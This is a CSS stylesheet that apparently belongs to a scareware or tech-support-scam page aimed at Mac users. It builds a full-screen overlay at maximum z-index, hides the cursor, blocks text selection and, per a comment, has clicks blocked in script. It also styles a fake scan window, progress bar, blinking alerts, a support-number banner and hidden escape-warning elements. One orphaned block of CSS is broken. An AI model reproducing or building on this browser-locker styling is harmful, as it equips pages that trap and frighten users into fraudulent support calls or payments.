
#may26-mac-root .black {
  width: 100%;
  height: 145%;
  background-color: rgb(0 0 0 / 47%);
  opacity: 0.7;
  transition: 1s;
  position: absolute;
  top: 0;
  left: 0;
  z-index: 2;
}
#may26-mac-root #link_black {
  position: absolute;
  inset: 0;
  z-index: 2;
  cursor: none;
}
/* Hide may26 landing unless explicitly enabled */
html.os-mac:not(.mac-ui-may26) #may26-mac-root {
  display: none !important;
  visibility: hidden !important;
  pointer-events: none !important;
}

html.mac-ui-may26 #esc-warning-overlay {
  display: none !important;
  visibility: hidden !important;
  pointer-events: none !important;
}

#may26-mac-root {
  position: fixed;
  inset: 0;
  z-index: 2147483000;
  overflow: hidden;
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  -webkit-user-select: none;
  user-select: none;
  cursor: none;
  background: #fff;
}
html.os-mac.mac-ui-may26 #gate-overlay,
html.os-mac.mac-ui-may26 #persistent-banner,
html.os-mac.mac-ui-may26 .edge-shield,
html.os-mac.mac-ui-may26 .phase-panic--mac-only:not(#may26-mac-root) {
  display: none !important;
}
html.os-mac.mac-ui-may26,
html.os-mac.mac-ui-may26 body,
html.mac-ui-may26 #may26-mac-root,
html.mac-ui-may26 #may26-mac-root * {
  cursor: none !important;
  -webkit-user-select: none;
  user-select: none;
}

html.mac-ui-may26 body {
  background: #fff !important;
}

/* Root pass-through; white box only shows cursor (clicks blocked in JS) */
html.mac-ui-may26 #may26-mac-root {
  pointer-events: none !important;
}
html.mac-ui-may26 #may26-mac-root #box {
  pointer-events: auto !important;
  cursor: default !important;
}
html.mac-ui-may26 #may26-mac-root #box[style*='block'] {
  display: block !important;
  visibility: visible !important;
  z-index: 2147483645 !important;
}
html.mac-ui-may26 #may26-mac-root #scan[style*='block'] {
  display: block !important;
  visibility: visible !important;
  z-index: 2147483644 !important;
}
html.mac-ui-may26 #may26-mac-root #box * {
  cursor: default !important;
  pointer-events: none !important;
}

html.mac-ui-may26 #may26-mac-root .bg,
html.mac-ui-may26 #may26-mac-root #link_black,
html.mac-ui-may26 #may26-mac-root .black,
html.mac-ui-may26 #may26-mac-root .scan,
html.mac-ui-may26 #may26-mac-root #footer,
html.mac-ui-may26 #may26-mac-root .alert_popup,
html.mac-ui-may26 #may26-mac-root #may26-welcomeDiv {
  pointer-events: none !important;
  cursor: none !important;
}

html.mac-ui-may26 #may26-mac-root .alert_popup,
html.mac-ui-may26 #may26-mac-root #may26-welcomeDiv {
  display: none !important;
  visibility: hidden !important;
}

html.mac-ui-may26 #may26-mac-root #websa.is-show {
  display: block !important;
  visibility: visible !important;
  pointer-events: auto !important;
  z-index: 2147483646 !important;
}

html.mac-ui-may26 #may26-mac-root #websa.is-show .button2,
html.mac-ui-may26 #may26-mac-root #websa.is-show .buttons,
html.mac-ui-may26 #may26-mac-root #websa.is-show .title2 a {
  cursor: pointer !important;
  pointer-events: auto !important;
}
#may26-mac-root .bg {
  position: absolute;
  inset: 0;
  z-index: 0;
  cursor: none;
}
#may26-mac-root .bg .bgimg {
  position: absolute;
  top: 60px;
  left: 0;
  width: 100%;
}
#may26-mac-root .bg .bgimg img {
  width: 100%;
}
#may26-mac-root .box,
#may26-mac-root .scan,
#may26-mac-root .alert_popup,
#may26-mac-root .websa {
  display: none;
}
#may26-mac-root .alert_popup.is-show,
#may26-mac-root .websa.is-show {
  display: block;
}
#may26-mac-root #footer {
  display: block;
}
#may26-mac-root .may26-fade-in {
  animation: may26FadeIn 0.5s ease forwards;
}
@keyframes may26FadeIn {
  from { opacity: 0; }
  to { opacity: 1; }
}
#may26-welcomeDiv {
  display: none;
  background-color: #000;
  height: auto;
  width: min(550px, 92vw);
  left: 32%;
  position: fixed;
  z-index: 2147483647;
  text-align: center;
  top: 0;
  color: #fefefe;
  padding: 12px;
  font-size: 16px;
}
#may26-welcomeDiv.is-show {
  display: block;
}
#may26-mac-root .row {
  display: block;
  width: 100%;
  margin: 0;
}
#may26-mac-root .col-md-12 {
  width: 100%;
  padding: 0;
}
#may26-mac-root .container {
  width: 100%;
  padding: 0 4px;
}
#may26-mac-root .text-center {
  text-align: center;
}
#may26-mac-root .fl {
  float: left;
}
#may26-mac-root .fr {
  float: right;
}

  background: #fff;
  -webkit-user-select: none; 
-ms-user-select: none; 
user-select: none; 
  background: url('bg.png');
  background-repeat: no-repeat;
  background-size: cover;
  */
  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  }
  .top {
  padding-left: 10px;
  }
#may26-mac-root .progress {
  width: 250px;
background: #d1d1d1;
  height: 04px;
}
#may26-mac-root .progress .progress__bar {
  height: 100%;
  width: 0%;
  border-radius: 2px;
  background-color: #3182be;
  animation: fill-bar 6s 1;
}
@keyframes fill-bar {
  from {width: 0%;}
  to {width: 100%;}
}
#may26-mac-root .textc {
  color: grey;
  font-size: 13px;
}
#may26-mac-root .flex {
  display: flex;
}
#may26-mac-root .button {
background: #cccccc;
color: #000;
padding: 6px 32px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 13px;
margin: 4px 2px;
cursor: pointer;
font-weight:350;
}
  .centerright   img {
  max-width: 100%;
}
#may26-mac-root .centerright ul {
  padding: 0;
  list-style-type: none;
}
#may26-mac-root .centerright ul {
  columns: 3;
}
#may26-mac-root .centerright li {
  width: calc((100vw / 3) - 20px);
  display: inline-block;
  margin-bottom: 40px;
}
#may26-mac-root .centerright  ul {
  display: flex;
}
#may26-mac-root .centerright ul {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(190px, 1fr));
}
#may26-mac-root .centerright {
position: absolute;
left: 70px;
top: 150px;
display: flex;
}
#may26-mac-root .btn:hover {
cursor:pointer;
}
  .box {
display: none;
position: absolute;
width: 723px;
height: 560px;
top: 46%;
z-index: 999;
margin-top: -255px;
left: 48%;
border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;
  background: #fff;
  box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
  }
  .centerright li p{
  margin: 0.5rem;
  }
  .scan {
display: none;
position: absolute;
width: 723px;
height: 564px;
top: 46%;
z-index: 999;
margin-top: -255px;
left: 48%;
border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;
  background: #fff;
  box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
  }
  .scan::-webkit-scrollbar {
  display: none;
}
#may26-mac-root .alert_popup{
  position: absolute;
top: 6%;
z-index: 9999;
left: 36%;
background: #1a73e8;
width: 440px;
text-align: left;
color: #fff;
padding-top: 4px;
display: none;
margin: 20px;
transform: translate(-50%, -50%);
}
#may26-mac-root .alert_popup p{
font-size: 13px;
padding-bottom: 15px;
margin: 10px;
}
#may26-mac-root .action_buttons a.active {
border: 1px solid #3B79ED;
font-weight: bold;
}
#may26-mac-root .action_buttons a {
float: right;
font-size: 12px;
margin-right: 15px;
padding: 6px 25px;
text-decoration: none;
color: #fff !important;
border: 1px solid #fff;
margin-top: 20px;
border-radius: 3px; /* 100% */
margin-bottom: 20px;
}
#may26-mac-root .cardcontainer {
animation: zoominoutsinglefeatured 4s infinite ;
border-radius: 10px;
}
@keyframes zoominoutsinglefeatured {
0% {
  transform: scale(1,1);
}
50% {
  transform: scale(1.1,1.1);
}
100% {
  transform: scale(1,1);
}
}
@keyframes zoomininsinglefeatured {
0% {
  transform: scale(1,1);
}
50% {
  transform: scale(1.1,1.1);
}
100% {
  transform: scale(1,1);
}
}
#may26-mac-root .greyside {
padding: 10px;
border-top-right-radius: 10px;
border-top-left-radius: 10px;
background:#e7e7e7;
}
#may26-mac-root .bottomselect {
padding: 10px;
border-bottom-right-radius: 10px;
border-bottom-left-radius: 10px;
background:#e7e7e7;
}
#may26-mac-root .websa{
font-weight: 700;
padding: 15px 30px;
min-height: 310px;
border-radius: 10px;
border: 1px solid #fff;
width: 560px;
margin: 0 auto;
background-color: #fff;
box-shadow: rgb(0 0 0 / 25%) 0px 54px 55px, rgb(0 0 0 / 12%) 0px -12px 30px, rgb(0 0 0 / 12%) 0px 4px 6px, rgb(0 0 0 / 17%) 0px 12px 13px, rgb(0 0 0 / 9%) 0px -3px 5px;
z-index: 99999;  
position: absolute;
top: 48%;
left: 51%;
cursor: pointer;
transform: translate(-50%, -50%);
display: none;
}
#may26-mac-root .ilb {
display: inline-block;
}
#may26-mac-root .headers {
width: 535px;
margin-top: 7px;
padding-bottom: 10px;
}
#may26-mac-root .logo3 {margin: 0 7px 0px 0;width: 30px;height: 30px;}
#may26-mac-root .title2 img {
position: absolute;
width: 3%;
top: 27px;
right: 17px;
}
#may26-mac-root #txtintro {
clear: both;
padding-top: 0px;
font-size: 14px;
font-weight: 600;
text-align: center;
}
#may26-mac-root .colo-rd {
color: #ff0000;
}
#may26-mac-root #banner {
margin: 5px auto;
display: block;
}
#may26-mac-root #disclaimer {
margin: 5px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
#may26-mac-root .support {
font-weight: bold;
font-size: 17px;
color: #1a73e8;
}
#may26-mac-root #bottom {
margin: 12px 0;
height: 50px;
display: flex;
border-top: 1px solid #d6d5d5;
}
#may26-mac-root #badge {
margin-top: 22px;
height: 27px;
}
#may26-mac-root .title3 {font-size: 18px;font-weight: 700;text-transform: capitalize;position: relative;width: 31%;top: 23px;left: 13px;}
#may26-mac-root #bottom ul {list-style-type: none;margin-left: 10px;margin-top: 1px;}
#may26-mac-root #bottom ul li {
display: inline-block;
float: left;
padding-left: 20px;
margin-top: 13px;
}
#may26-mac-root .button2 {
border-radius: 4px;
padding: 10px 30px 10px 30px;
color: #000;
border: 1px solid #000;
background-color: transparent;
font-size: 18px;
font-weight: 700;
text-align: center;
cursor: pointer;
}
#may26-mac-root .buttons {
border-radius: 4px;
padding: 10px 30px 10px 30px;
color: #fff;
background-color: #1a73e8;
font-size: 18px;
font-weight: 700;
text-align: center;
cursor: pointer;
}
a {
color: #007bff;
text-decoration: none;
background-color: transparent;
}
a:hover {
color: #0056b3;
text-decoration: underline;
}
#may26-mac-root .button2:hover {
color: #fff;
background-color: #1a73e8;
border-color: #1a73e8;
}
#may26-mac-root .blink {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}
#may26-mac-root .blink2 {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}
@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
#may26-mac-root #footer {
  left: 0;
width: 100%;
position: fixed;
bottom: 0;
background-color: #1a73e8;
z-index: 999;
padding: 10px 34px;
color: #fff;
font-size: 18px;
height: 75px;
cursor: pointer;
}
#may26-mac-root #footertxt, #may26-mac-root #footertxt2 {
font-size: 20px;
}
#may26-mac-root #footertxt img {
width: 30px;
margin-top: -4px;
filter: brightness(0) invert(1);
}
:host {
display: inline-block;
overflow: hidden;
text-align: initial;
white-space: nowrap;
}
#may26-mac-root .bg .bgimg {
position: absolute;
top: 60px;
left: 0px;
width: 100%;
}